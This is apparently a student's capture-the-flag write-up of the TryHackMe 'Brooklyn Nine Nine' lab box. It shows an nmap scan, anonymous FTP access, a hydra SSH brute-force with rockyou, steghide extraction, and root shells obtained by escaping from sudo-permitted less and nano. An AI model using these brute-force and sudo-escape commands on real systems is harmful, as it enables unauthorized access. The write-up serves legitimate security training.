[THM] Brooklyn Nine Nine

This room is aimed for beginner level hackers but anyone can try to hack this box. There are two main intended ways to root the box.

Link to the room


This room is solved in two ways:

  • brute forcing a user’s password and escalation privileges using lesscommand
  • finding an image on the web page with a user’s password and escalating privileges using nanocommand

[Task 1] Deploy and get hacking

#1 User flag

$ nmap -sC -sV -T4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 12:46 CEST
Nmap scan report for
Host is up (0.069s latency).
Not shown: 997 closed ports
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 119 May 17 23:17 note_to_jake.txt
| ftp-syst:
| FTP server status:
| Connected to ::ffff:
| Logged in as ftp
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 16:7f:2f:fe:0f:ba:98:77:7d:6d:3e:b6:25:72:c6:a3 (RSA)
| 256 2e:3b:61:59:4b:c4:29:b5:e8:58:39:6f:6f:e9:9b:ee (ECDSA)
|_ 256 ab:16:2e:79:20:3c:9b:0a:01:9c:8c:44:26:01:58:04 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesnt have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.68 seconds

the scan shows us ftp, ssh and a web page

as ftp allows anonymous login I get in and download the .txt there:

root@kali:~# cat note_to_jake.txt
From Amy,
Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine

Jake’s password sucks, I’m going to try to crack it:

$ hydra -l jake -P /usr/share/wordlists/rockyou.txt ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-22 13:00:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://
[22][ssh] host: login: jake password: 987654321

lets ssh jake’s account.


#2 Root flag

once inside the machine I see that I can run less as root so it is very easy to escalate privileges

jake@brookly_nine_nine:/home/holt$ sudo -l
Matching Defaults entries for jake on brookly_nine_nine:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jake may run the following commands on brookly_nine_nine:
(ALL) NOPASSWD: /usr/bin/less
sudo less /etc/profile

[Alternate way]

I also found in the image of the web page a hidden file with Holt’s password which allowed me to access the machine as Holt

<p>This example creates a full page background image. Try to resize the browser window to see how it always will cover the full screen (when scrolled to top), and that it scales nicely on all screen sizes.</p>
<!-- Have you ever heard of steganography? -->

I tried with the password admin and it worked amazingly, in so many ways, I could have used stegcrackerto get the password:

root@kali:~# steghide extract -sf brooklyn99.jpg
Enter passphrase: # admin
wrote extracted data to "note.txt".
root@kali:~# cat note.txt
Holts Password:

once inside holt account, I run sudo -l and I see that I can run nano as root, privilege escalation is very easy:

sudo nano
reset; bash 1>&0 2>&0

Computer Science student. Capture the flag player.